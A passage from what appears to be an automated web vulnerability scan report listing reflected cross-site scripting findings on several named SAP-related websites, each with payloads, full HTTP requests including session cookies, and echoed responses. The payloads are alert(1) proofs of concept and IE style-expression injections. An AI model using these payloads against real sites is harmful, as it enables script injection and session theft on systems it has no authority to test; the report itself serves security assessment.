Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f770"><script>alert(1)</script>5e7e43a56dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/swc/common.tao6f770"><script>alert(1)</script>5e7e43a56dc?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/js/swc/common.tao6f770"><script>alert(1)</script>5e7e43a56dc">
...[SNIP]...
3.109. http://www.sapphirenow.com/login.aspx [ReturnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The value of the ReturnUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcf2f"style%3d"x%3aexpression(alert(1))"34bced315ef was submitted in the ReturnUrl parameter. This input was echoed as fcf2f"style="x:expression(alert(1))"34bced315ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspxfcf2f"style%3d"x%3aexpression(alert(1))"34bced315ef HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:26:15 GMT
Content-Length: 42972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspxfcf2f"style="x:expression(alert(1))"34bced315ef" style="width: 668px" />
...[SNIP]...
3.110. http://www.sapphirenow.com/login.aspx [a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The value of the a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5712%20style%3dx%3aexpression(alert(1))%20272adda801e was submitted in the a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 parameter. This input was echoed as f5712 style=x:expression(alert(1)) 272adda801e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1f5712%20style%3dx%3aexpression(alert(1))%20272adda801e HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=jaulcs2tyzxxmgycdn1cnz55; X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; __utma=270210419.1641825112.1318688722.1318688722.1318692187.2; __utmb=270210419.1.10.1318692188; __utmc=270210419; __utmz=270210419.1318692188.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; 37021986-VID=5110247826455; 37021986-SKEY=6638045003516868152; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:29:52 GMT
Content-Length: 43078


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspx&a00f1"style="x:expression(alert(1))"5e28a9da3e5=1f5712 style=x:expression(alert(1)) 272adda801e" style="width: 668px" />
...[SNIP]...
3.111. http://www.sapphirenow.com/login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a00f1"style%3d"x%3aexpression(alert(1))"5e28a9da3e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a00f1"style="x:expression(alert(1))"5e28a9da3e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx&a00f1"style%3d"x%3aexpression(alert(1))"5e28a9da3e5=1 HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:26:21 GMT
Content-Length: 42982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspx&a00f1"style="x:expression(alert(1))"5e28a9da3e5=1" style="width: 668px" />
...[SNIP]...
3.112. http://www.sapvirtualevents.com/teched [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8105'-alert(1)-'ed14687c86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched?d8105'-alert(1)-'ed14687c86f=1 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:55 GMT
Content-Length: 92618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/?d8105'-alert(1)-'ed14687c86f=1default.aspx&ssostatus=1&info=' + sap_token </script>
...[SNIP]...
3.113. http://www.sapvirtualevents.com/teched/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4b6c'-alert(1)-'d067c1ecac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/?d4b6c'-alert(1)-'d067c1ecac1=1 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:40 GMT
Content-Length: 92618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/?d4b6c'-alert(1)-'d067c1ecac1=1default.aspx&ssostatus=1&info=' + sap_token </script>
...[SNIP]...
3.114. http://www.sapvirtualevents.com/teched/Sessions.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/Sessions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af3a6'-alert(1)-'cb07f8d2693 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/Sessions.aspx?af3a6'-alert(1)-'cb07f8d2693=1 HTTP/1.1
Host: www.sapvirtualevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:05:07 GMT
Connection: close
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 81914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/sessions.aspx?af3a6'-alert(1)-'cb07f8d2693=1&ssostatus=1&info=' + sap_token </script>
...[SNIP]...
3.115. http://www.sapvirtualevents.com/teched/default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5afd5'-alert(1)-'3a8fca97ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/default.aspx?5afd5'-alert(1)-'3a8fca97ca=1 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55; IsFirstTimeLogin=1; userID=1; securityRoleID=0; .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||edcbb5be-eddd-4d03-b903-d45503e9170c|United States|4b117873-111d-43fb-aa45-4e60c941153b|true

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:56 GMT
Content-Length: 92628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/default.aspx?5afd5'-alert(1)-'3a8fca97ca=1&ssostatus=1&info=' + sap_token </script>
...[SNIP]...
3.116. http://www.sapvirtualevents.com/teched/login.aspx [ReturnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The value of the ReturnUrl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 433fe'%3balert(1)//fea0f539288 was submitted in the ReturnUrl parameter. This input was echoed as 433fe';alert(1)//fea0f539288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26433fe'%3balert(1)//fea0f539288 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:56 GMT
Content-Length: 92626


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/default.aspx?433fe';alert(1)//fea0f539288&ssostatus=1&info=' + sap_token </script>
...[SNIP]...
3.117. http://www.sapvirtualevents.com/teched/sessiondetails.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/sessiondetails.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee866'-alert(1)-'cfeab9a4511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /teched/sessiondetails.aspx?ee866'-alert(1)-'cfeab9a4511=1 HTTP/1.1
Host: www.sapvirtualevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:05:11 GMT
Connection: close
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 87238


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<script type="text/javascript">if(sap_token != null) window.location.href = 'http://www.sapvirtualevents.com/teched/sessiondetails.aspx?ee866'-alert(1)-'cfeab9a4511=1&ssostatus=1&info=' + sap_token </script>
...[SNIP]...
3.118. http://www.sdn.sap.com/irj/scn/advancedsearch [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/advancedsearch

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 926f2"><a>1b7807551cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/advancedsearch?query=xss+password+help+faq+contact&926f2"><a>1b7807551cd=1 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fq%2ftop_weblogs; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318691787|check#true#1318689987; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691728224%3B%20pe%3Dno%2520value%7C1318691728230%3B%20c3%3Dno%2520value%7C1318691728253%3B%20s_nr%3D1318689928258-New%7C1321281928258%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293528260%3B%20s_visit%3D1%7C1318691728263%3B%20gpv_p47%3Dno%2520value%7C1318691728265%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Asdnweblogs%2525253Apopularposts%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.searchboxform.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28856
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 15:01:13 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/advancedsearch?query=xss+password+help+faq+contact&926f2"><a>1b7807551cd=1">
...[SNIP]...
3.119. http://www.sdn.sap.com/irj/scn/advancedsearch [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sdn.sap.com
Path:   /irj/scn/advancedsearch

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d29"><a>12c19bdc070 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/advancedsearch?query=xss+password+help+faq+contact95d29"><a>12c19bdc070 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fq%2ftop_weblogs; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318691787|check#true#1318689987; 